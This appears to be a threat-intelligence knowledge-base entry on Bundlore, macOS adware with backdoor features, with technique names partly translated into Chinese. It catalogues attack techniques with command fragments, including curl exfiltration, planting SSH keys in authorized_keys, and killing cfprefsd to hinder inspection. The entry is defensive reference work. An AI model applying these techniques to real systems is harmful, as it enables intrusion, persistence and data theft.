1. Home
  2. Software
  3. Bundlore

Bundlore

Bundlore is adware written for macOS that has been in use since at least 2015. Though categorized as adware, Bundlore has many features associated with more traditional backdoors.[1]

ID: S0482
Associated Software: OSX.Bundlore
Type: MALWARE
Platforms: macOS
Version: 1.1
Created: 01 July 2020
Last Modified: 10 February 2022

Associated Software Descriptions

Name Description
OSX.Bundlore

[1]
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1036 .005 伪装: Match Legitimate Name or Location

Bundlore has disguised a malicious .app file as a Flash Player update.[1]
Enterprise T1543 .001 创建或修改系统进程: Launch Agent

Bundlore can persist via a LaunchAgent.[1]
.004 创建或修改系统进程: Launch Daemon

Bundlore can persist via a LaunchDaemon.[1]
Enterprise T1140 反混淆/解码文件或信息

Bundlore has used openssl to decrypt AES encrypted payload data. Bundlore has also used base64 and RC4 with a hardcoded key to deobfuscate data.[1]
Enterprise T1059 .002 命令与脚本解释器: AppleScript

Bundlore can use AppleScript to inject malicious JavaScript into a browser.[1]
.004 命令与脚本解释器: Unix Shell

Bundlore has leveraged /bin/sh and /bin/bash to execute commands on the victim machine.[1]
.006 命令与脚本解释器: Python

Bundlore has used Python scripts to execute payloads.[1]
.007 命令与脚本解释器: JavaScript

Bundlore can execute JavaScript by injecting it into the victim's browser.[1]
Enterprise T1562 .001 妨碍防御: Disable or Modify Tools

Bundlore can change browser security settings to enable extensions to be installed. Bundlore uses the pkill cfprefsd command to prevent users from inspecting processes.[1][2]
Enterprise T1071 .001 应用层协议: Web Protocols

Bundlore uses HTTP requests for C2.[1]
Enterprise T1222 .002 文件和目录权限修改: Linux and Mac File and Directory Permissions Modification

Bundlore changes the permissions of a payload using the command chmod -R 755.[2]
Enterprise T1048 替代协议渗出

Bundlore uses the curl -s -L -o command to exfiltrate archived data to a URL.[2]
Enterprise T1176 浏览器扩展

Bundlore can install malicious browser extensions that are used to hijack user searches.[1]
Enterprise T1189 浏览器攻击

Bundlore has been spread through malicious advertisements on websites.[1]
Enterprise T1027 混淆文件或信息

Bundlore has obfuscated data with base64, AES, RC4, and bz2.[1]
Enterprise T1204 .002 用户执行: Malicious File

Bundlore has attempted to get users to execute a malicious .app file that looks like a Flash Player update.[1]
Enterprise T1082 系统信息发现

Bundlore will enumerate the macOS version to determine which follow-on behaviors to execute using /usr/bin/sw_vers -productVersion.[1][2]
Enterprise T1098 .004 账号操控: SSH Authorized Keys

Bundlore creates a new key pair with ssh-keygen and drops the newly created user key in authorized_keys to enable remote login.[1]
Enterprise T1518 软件发现

Bundlore has the ability to enumerate what browser is being used as well as version information for Safari.[1]
Enterprise T1105 输入工具传输

Bundlore can download and execute new versions of itself.[1]
Enterprise T1056 .002 输入捕获: GUI Input Capture

Bundlore prompts the user for their credentials.[1]
Enterprise T1057 进程发现

Bundlore has used the ps command to list processes.[1]
Enterprise T1564 隐藏伪装

Bundlore uses the mktemp utility to make unique file and directory names for payloads, such as TMP_DIR=`mktemp -d -t x.[2]

References

  1. Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.
  1. Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.